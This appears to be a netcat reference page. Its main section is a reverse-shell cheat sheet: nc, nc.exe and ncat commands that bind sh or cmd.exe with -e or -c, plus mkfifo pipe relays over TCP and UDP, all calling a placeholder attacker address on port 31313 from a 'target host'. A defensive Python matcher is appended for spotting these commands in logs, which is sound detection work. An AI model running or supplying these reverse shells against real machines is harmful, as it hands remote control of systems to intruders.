netcat, the TCP/IP "Swiss Army Knife"

About netcat:

Netcat is a fully featured networking utility which reads and writes data across network connections, using the TCP/IP protocol.

It is designed to be a reliable "back-end" tool that can be used directly or easily driven by other programs and scripts. At the same time, it is a feature-rich network debugging and exploration tool, since it can create almost any kind of connection you would need and has several interesting built-in capabilities.

Netcat is commonly referred to as the "TCP/IP Swiss Army Knife", by those who know how to use it. It comes pre-installed on a lot of operating systems. Here are some links to various versions of netcat. Refer to their respective websites to find any differences that exist:

Reverse Shells: netcat style

The -e flag is sometimes disabled at compile time, and some re-implementations of netcat do not include it at all. If the version on your target host does support it, the -e flag lets you bind netcat to any executable, which makes spawning a reverse shell trivial:

nc -e sh 123.456.789.012 31313
nc.exe -e cmd.exe 123.456.789.012 31313
ncat 123.456.789.012 31313 -e sh

Sometimes -e is simply replaced by the similar -c (check your help file or man page):

nc -c sh 123.456.789.012 31313

netcat without being able to bind a command to a port

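Other times, neither -e nor -c is provided. You can still use netcat to spawn a reverse shell by creating a named pipe (FIFO). To do this, you create the pipe with mkfifo and connect it to netcat and the cat (concatenate) command: cat feeds whatever arrives in the pipe to the shell, the shell's output goes to netcat, and netcat writes what it receives back into the pipe, like so: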

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 123.456.789.012 31313 >/tmp/f

The same named-pipe approach as a reverse shell over UDP:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|ncat -u 123.456.789.012 31313 >/tmp/f
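
For defenders, the command shapes above are distinctive enough to match in shell history or process-creation logs. The following is an added example, not part of the original page: a small Python matcher for the -e/-c form and the mkfifo relay form. The function names, the labels, the "netcat" binary alias and the benign sample lines (192.0.2.x addresses) are assumptions made for illustration.

```python
import re

# Binaries named on this page (nc, nc.exe, ncat); "netcat" is an assumed alias.
NETCAT = re.compile(r"(?:^|[/\\])(?:nc|ncat|netcat)(?:\.exe)?$", re.I)
SHELL = re.compile(r"(?:^|[/\\])(?:sh|bash|cmd(?:\.exe)?)$", re.I)

def exec_flag_hit(argv):
    """netcat started with -e or -c whose argument is a shell."""
    if not argv or not NETCAT.search(argv[0]):
        return False
    # Pair each token with its successor so the flag may sit before or after the host.
    return any(flag in ("-e", "-c") and SHELL.search(value)
               for flag, value in zip(argv, argv[1:]))

def fifo_relay_hit(cmdline):
    """mkfifo, an interactive shell and netcat chained in one command line."""
    stages = [s.split() for s in re.split(r"[;|]", cmdline)]
    stages = [s for s in stages if s]
    made_fifo = any(s[0] == "mkfifo" for s in stages)
    interactive = any(SHELL.search(s[0]) and "-i" in s for s in stages)
    netcat = any(NETCAT.search(s[0]) for s in stages)
    return made_fifo and interactive and netcat

def classify(cmdline):
    """Return 'fifo-relay', 'exec-flag' or None for one logged command line."""
    if fifo_relay_hit(cmdline):
        return "fifo-relay"
    if exec_flag_hit(cmdline.split()):
        return "exec-flag"
    return None

def scan(lines):
    """Return (line_number, label) for every suspicious line."""
    hits = ((n, classify(line)) for n, line in enumerate(lines, 1))
    return [(n, label) for n, label in hits if label]

# Constructed sample: lines 1, 3 and 5 are the page's commands, 2 and 4 are benign.
SAMPLE = [
    "nc -e sh 123.456.789.012 31313",
    "nc -zv 192.0.2.10 22",
    "ncat 123.456.789.012 31313 -e sh",
    "rsync -e ssh /srv backup@192.0.2.20:/srv",
    "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 123.456.789.012 31313 >/tmp/f",
]

if __name__ == "__main__":
    for n, label in scan(SAMPLE):
        print(f"line {n}: {label}")
```

Name matching misses renamed binaries, so treat a hit as one signal alongside egress monitoring rather than as complete coverage.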